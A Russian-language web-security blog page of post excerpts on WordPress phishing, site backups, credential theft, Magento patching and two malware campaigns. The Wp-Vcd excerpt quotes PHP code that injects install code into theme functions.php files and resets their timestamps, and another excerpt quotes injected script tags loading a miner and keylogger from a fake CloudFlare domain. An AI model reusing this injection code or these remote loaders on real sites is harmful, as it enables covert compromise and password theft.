БЛОГ


Давно не писал, лето, знаете ли

По сообщению компаний, работающих в сфере IT безопасности, с начал сентября зафиксирована необычная технология кражи паролей Wordpress при помощи рассылки фишинговых писем.

Поддельное письмо выглядит как стандартное сообщение рассылки wordpress.org администраторам сайтов о необходимости обновления, стоит заметить, что  используемое оформление  соответствует устаревшим версиям CMS.

Опубликовано в БЛОГ

Наверное, многим знакома ситуация, когда из-за взлома сайт перестает работать, вроде бы «откатиться» на резервную копию, но взлом сайта произошел давно, и все резервные копии оказываются зараженными. К тому же о проникновении на сайт хочется узнавать незамедлительно, а не когда для восстановления приходится тратить много сил и времени. Сразу оговорюсь, для полной автоматизации придется купить плагин за 10 долларов, что не сумма для любого проекта.

Настройка

Загружаем компонент с сайта разработчика, установка стандартна. Единственное замечание, русификация компонента сейчас сделана не полностью, полную версию можно загрузить с нашего сайта, перевод будет включен в состав следующего дистрибутива.

Отрываем в админ панели - компоненты, site:

Опубликовано в БЛОГ

Сайты ломают, такое случается, причины разные, основные, это несвоевременное обновление расширений и кража паролей с компьютера администратора.


Остановимся немного подробнее на кражах паролей, в первом случае это может быть банальный вирус на компьютере, во втором, сохранённые в браузере пароли. Сохранять пароли конечно удобно, не нужно вводить при каждом входе в панель управления, особенно если нужно вносить материалы по нескольку раз в день.

В январе 2018 года специалистами различных компаний было зафиксировано несколько нестандартных подходов к краже учетных данных. Например, на стороннем, взломанном сайте размещается JS, посетителю, просматривающему сайт, подгружается скрипт, который просматривает сохранённые адреса и пароли от наиболее популярных CMS (/admin, /wp-admin, /administrator).

Также замечены кейлогеры распространяемые через поддельные домены Cloudflare, которые через JS также похищают пароли от панелей управления сайтами и хостингом.

Не так давно ко мне обратился заказчик с повторным заражением сайтов,  чему я был немало удивлен, поскольку считал, что закрыл все «дыры».

Опубликовано в БЛОГ

В данном материале будет показан способ альтернативного обновления Magento , статья переводная.

Для популярного движка электронной коммерции Magento 28 сентября 2017 года был выпущен патч 10415 SUPEE 1.9.3.7 для решения нескольких критических проблем безопасности, таких как удаленное выполнение произвольного кода, межсайтовый скриптинг и так далее.

До сих пор не все владельцы ресурсов  обновили свои сайты, основная причина – использование SSL для установки обновлений, что и является основным препятствием для обновления.

Компания Magecomp предлагает альтернативный способ наложения патчей и рекомендует как можно скорее установить их, чтобы защитить Magento от возможных угроз безопасности.

Опубликовано в БЛОГ

Новая атака зафиксированная в конце ноября. Для атаки используется уже известный Wp-Vcd yj но методы распространения претерпели некоторый изменения.

Так с помощью кода:

if ($ content = file_get_contents ($ themes. DIRECTORY_SEPARATOR. $ _. DIRECTORY_SEPARATOR. 'functions.php')) {
  if (strpos ($ content, 'WP_V_CD') === false) {
  $ content = $ install_code.  $ content;
  @file_put_contents ($ themes. DIRECTORY_SEPARATOR. $ _. DIRECTORY_SEPARATOR. 'functions.php', $ content);
  touch ($ themes. DIRECTORY_SEPARATOR. $ _. DIRECTORY_SEPARATOR. 'functions.php', $ time);
  }
  else {$ ping = false;  }
  }

сбрасывается дата изменения файла,  затем в базу загружается содержимое удаленного txt-файла с  именами хостов и паролями инъекций кода.

Опубликовано в БЛОГ

К вредоносному скрипту криптомайнинга cloudflare.solutions, который несколько недель назад был обнаружен специалистами Sucuri, добавлена новая функция кейлогера.

Вводная часть этой вредоносной программы вообще не изменилась, и использует function.php , чтобы вызвать следующие сценарии на страницах WordPress:

 

<script type = 'text / javascript' src = 'hxxp: // cloudflare [.] solutions /ajax/libs/reconnecting-websocket/1.0.0/reconnecting-websocket.js'> </ script>

 <script type = 'text / javascript' src = 'hxxp: // cloudflare [.] solutions /ajax/libs/cors/cors.js'> </ script>

 

URL-адреса сценариев также совпадают, однако они используют поддельный домен CloudFlare. Первая  (reconnecting-websocket.js) по-прежнему загружает копию законной библиотеки ReconnectingWebSocket .

Основное изменение - скрипт cors.js. Теперь, после его декодирования там нет абсолютно подозрительного кода. Также скрипт загружает Яндекс Метрику, скорее всего, это делается для отслеживания зараженных сайтов. Кстати, идентификатор  этого Яндекс скрипта - 43930119 - его можно найти в HTML-коде главной страницы.

Опубликовано в БЛОГ